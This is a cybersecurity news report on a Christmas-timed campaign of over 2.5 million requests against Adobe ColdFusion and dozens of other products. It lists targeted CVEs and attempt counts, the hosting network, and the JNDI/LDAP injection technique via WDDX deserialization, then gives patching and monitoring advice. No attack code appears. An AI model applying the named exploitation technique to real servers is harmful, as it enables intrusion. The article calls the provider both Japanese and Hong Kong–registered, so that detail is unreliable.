The Christmas Blitz: Coordinated Attack Spikes to 2.5M Requests via Adobe ColdFusion
In the midst of the Christmas holidays, researchers at Greynoise detected a large-scale cyberattack targeting vulnerable Adobe ColdFusion servers. Within a short period, more than 2.5 million malicious requests were recorded, pointing to a coordinated and technically sophisticated operation that impacted dozens of different technologies.
The initial wave of attacks focused on roughly a dozen well-known vulnerabilities in Adobe ColdFusion, with approximately 6,000 direct exploitation attempts observed. Further analysis, however, revealed a far broader campaign. Two primary IP addresses, registered to the Japanese provider CTG Server Limited, generated millions of requests probing nearly 800 distinct vulnerabilities across 47 different technology stacks. Around 10,000 unique domains were used to verify successful intrusions.
The timing of the attack was deliberate. Nearly 68 percent of the traffic occurred on December 25, a day when most corporate security teams operate with reduced staffing. This suggests a high degree of attacker awareness regarding organizational workflows and security monitoring practices.
To confirm successful compromises, the attackers leveraged the ProjectDiscovery Interactsh infrastructure, enabling real-time visibility into which systems had been breached. This capability accelerated subsequent phases of the operation, including potential persistence and lateral movement within affected networks.
Particular emphasis was placed on critical vulnerabilities such as CVE-2023-26359, a remote code execution flaw that was targeted 833 times. CVE-2023-38205, which allows attackers to bypass access control mechanisms, saw 654 exploitation attempts, while CVE-2023-44353 was abused in 611 cases. The primary intrusion technique involved JNDI/LDAP injection via the WDDX deserialization mechanism, using the JdbcRowSetImpl gadget chain to trigger remote code execution.
Beyond ColdFusion, the campaign extended to a wide array of additional targets, including Java application servers, popular content management systems, web frameworks, Atlassian products, network devices, and video surveillance systems. The Confluence vulnerability CVE-2022-26134 alone attracted more than 12,000 exploit attempts. Even the long-known Shellshock flaw (CVE-2014-6271) was not overlooked, having been exploited over 8,500 times.
The attack infrastructure was hosted within autonomous system AS152194, operated by the Hong Kong–registered company CTG Server Limited, which has previously surfaced in investigations into phishing campaigns and spam operations. Within its network, researchers identified FUNNULL CDN infrastructure linked to attacks against luxury brands, pointing to weak abuse controls and rapid expansion of its IP address space.
Organizations running ColdFusion are urged to apply security updates as soon as possible to remediate vulnerabilities, including CVE-2023-26359 and CVE-2023-38205. In addition, monitoring systems should be configured to detect JNDI injection attempts, suspicious callback domains, and characteristic network fingerprints associated with the attackers. Continuous vulnerability scanning and vigilant tracking of new exploitation attempts remain essential pillars of effective defense.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
